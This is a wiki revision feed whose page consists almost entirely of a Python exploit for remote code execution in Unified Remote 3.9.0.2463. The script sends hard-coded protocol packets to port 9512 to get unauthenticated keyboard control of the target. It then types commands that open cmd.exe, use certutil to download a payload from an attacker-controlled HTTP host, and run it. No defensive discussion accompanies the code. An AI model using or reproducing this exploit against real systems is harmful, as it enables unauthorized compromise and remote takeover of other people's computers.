https://pwnwiki.com/index.php?action=history&feed=atom&title=Unified_Remote_3.9.0.2463_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Unified Remote 3.9.0.2463 遠程代碼執行漏洞 - Revision history
2026-04-16T05:08:51Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Unified_Remote_3.9.0.2463_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=1494&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> # Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution # Author: H4rk3nz0 # Vendor Homepage: https://www.unifiedremote.com/ # Software Link: https://..."
2021-04-11T01:07:02Z
<p>Created page with "==EXP== <pre> # Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution # Author: H4rk3nz0 # Vendor Homepage: https://www.unifiedremote.com/ # Software Link: https://..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
# Exploit Title: Unified Remote 3.9.0.2463 - Remote Code Execution<br />
# Author: H4rk3nz0<br />
# Vendor Homepage: https://www.unifiedremote.com/<br />
# Software Link: https://www.unifiedremote.com/download<br />
# Tested on: Windows 10, 10.0.19042 Build 19042<br />
<br />
#!/usr/bin/python<br />
<br />
import socket<br />
import sys<br />
import os<br />
from time import sleep<br />
<br />
target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)<br />
<br />
port = 9512<br />
<br />
# Packet Data Declarations; Windows, Space and Enter have non-standard values<br />
<br />
open = ("00000085000108416374696f6e00000550617373776f72640038653831333362332d61313862"<br />
"2d343361662d613763642d6530346637343738323763650005506c6174666f726d00616e64726f696400"<br />
"0852657175657374000005536f7572636500616e64726f69642d64373038653134653532383463623831"<br />
"000356657273696f6e000000000a00").decode("hex")<br />
<br />
open_fin = ("000000c8000108416374696f6e0001024361706162696c69746965730004416374696f6e7"<br />
"3000104456e6372797074696f6e3200010446617374000004477269640001044c6f6164696e6700010453"<br />
"796e630001000550617373776f72640064363334633164636664656238373335363038613461313034646"<br />
"5643430373664653736366464363134343336313938303961643766333538353864343439320008526571"<br />
"75657374000105536f7572636500616e64726f69642d643730386531346535323834636238310000"<br />
).decode("hex")<br />
<br />
one = ("000000d2000108416374696f6e00070549440052656c6d746563682e4b6579626f61726400024"<br />
"c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000656616c756"<br />
"5730002000556616c756500").decode("hex")<br />
<br />
two = ("00000000054e616d6500746f67676c6500000854797065000800000008526571756573740007"<br />
"0252756e0002457874726173000656616c7565730002000556616c756500").decode("hex")<br />
<br />
three = ("00000000054e616d6500746f67676c65000005536f7572636500616e64726f69642d643730"<br />
"386531346535323834636238310000").decode("hex")<br />
<br />
win_key = ("000000d8000108416374696f6e00070549440052656c6d746563682e4b6579626f61726"<br />
"400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617300065"<br />
"6616c7565730002000556616c7565004c57494e00000000054e616d6500746f67676c6500000854797"<br />
"0650008000000085265717565737400070252756e0002457874726173000656616c756573000200055"<br />
"6616c7565004c57494e00000000054e616d6500746f67676c65000005536f7572636500616e64726f6"<br />
"9642d643730386531346535323834636238310000").decode("hex")<br />
<br />
ret_key = ("000000dc000108416374696f6e00070549440052656c6d746563682e4b6579626f6172"<br />
"6400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e0002457874726173000"<br />
"656616c7565730002000556616c75650052455455524e00000000054e616d6500746f67676c650000"<br />
"08547970650008000000085265717565737400070252756e0002457874726173000656616c7565730"<br />
"002000556616c75650052455455524e00000000054e616d6500746f67676c65000005536f75726365"<br />
"00616e64726f69642d643730386531346535323834636238310000").decode("hex")<br />
<br />
space_key = ("000000da000108416374696f6e00070549440052656c6d746563682e4b6579626f6"<br />
"1726400024c61796f75740006436f6e74726f6c73000200024f6e416374696f6e000245787472617"<br />
"3000656616c7565730002000556616c756500535041434500000000054e616d6500746f67676c650"<br />
"00008547970650008000000085265717565737400070252756e0002457874726173000656616c756"<br />
"5730002000556616c756500535041434500000000054e616d6500746f67676c65000005536f75726"<br />
"36500616e64726f69642d643730386531346535323834636238310000").decode("hex")<br />
<br />
# ASCII to Hex Conversion Set<br />
characters={<br />
"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",<br />
"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",<br />
"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",<br />
"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",<br />
"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",<br />
"+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",<br />
">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",<br />
"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",<br />
"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}<br />
<br />
# User Specified arguments<br />
try:<br />
rhost = sys.argv[1]<br />
lhost = sys.argv[2]<br />
payload = sys.argv[3]<br />
except:<br />
print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")<br />
<br />
<br />
# Send Windows Key Input Twice<br />
def SendWin():<br />
target.sendto(win_key,(rhost, port))<br />
target.sendto(win_key,(rhost, port))<br />
sleep(0.4)<br />
<br />
<br />
# Send Enter/Return Key Input<br />
def SendReturn():<br />
target.sendto(ret_key,(rhost, port))<br />
sleep(0.4)<br />
<br />
# Send String Characters<br />
def SendString(string, rhost):<br />
for char in string:<br />
if char == " ":<br />
target.sendto(space_key,(rhost, port))<br />
sleep(0.02)<br />
else:<br />
convert = characters[char].decode("hex")<br />
target.sendto(one + convert + two + convert + three,(rhost, port))<br />
sleep(0.02)<br />
<br />
# Main Execution<br />
def main():<br />
target.connect((rhost,port))<br />
sleep(0.5)<br />
print("[+] Connecting to target...")<br />
target.sendto(open,(rhost,port)) # Initialize Connection to Unified<br />
sleep(0.02)<br />
target.sendto(open_fin,(rhost,port)) # Finish Initializing Connection<br />
print("[+] Popping Start Menu")<br />
sleep(0.02)<br />
SendWin()<br />
sleep(0.3)<br />
print("[+] Opening CMD")<br />
SendString("cmd.exe", rhost)<br />
sleep(0.3)<br />
SendReturn()<br />
sleep(0.3)<br />
print("[+] *Super Fast Hacker Typing*")<br />
SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\\Temp\\" + payload, rhost) # Retrieve HTTP hosted payload<br />
sleep(0.3)<br />
print("[+] Downloading Payload")<br />
SendReturn()<br />
sleep(3)<br />
SendString("C:\\Windows\\Temp\\" + payload, rhost) # Execute Payload<br />
sleep(0.3)<br />
SendReturn()<br />
print("[+] Done! Check listener?")<br />
target.close()<br />
<br />
if __name__=="__main__":<br />
main()<br />
</pre></div>
Pwnwiki